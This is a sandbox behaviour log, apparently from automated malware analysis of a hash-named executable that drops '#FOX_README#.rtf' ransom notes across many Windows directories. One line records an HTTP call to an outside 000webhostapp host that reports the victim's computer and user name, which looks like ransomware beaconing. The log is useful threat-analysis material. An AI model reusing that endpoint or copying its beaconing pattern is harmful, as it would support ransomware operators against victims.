f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Libraries\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\plugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\datareporting\archived\2020-07\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Music\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\security\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Recovery\051be182-cc51-11ea-ac13-46f8a7600ebe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bl84ptbo.Admin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe HTTP URL 3 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=UCQFZDUI|Admin&sid=rhCRvpynnHrrWMnj&phase=START Process not Found File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Saved Games\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\bin\server\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\OfflineCache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Pictures\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Pictures\Sample Pictures\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\default\moz-extension+++74bf55e1-f8f0-4b8e-ae67-9c4088745841^userContextId=4294967295\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Links\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\default\moz-extension+++74bf55e1-f8f0-4b8e-ae67-9c4088745841^userContextId=4294967295\idb\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\browser\features\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Public\Documents\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Favorites\Links for United States\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\startupCache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\Videos\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\ProgramData\Microsoft\MF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2090973689-680783404-4292415065-1000\#FOX_README#.rtf 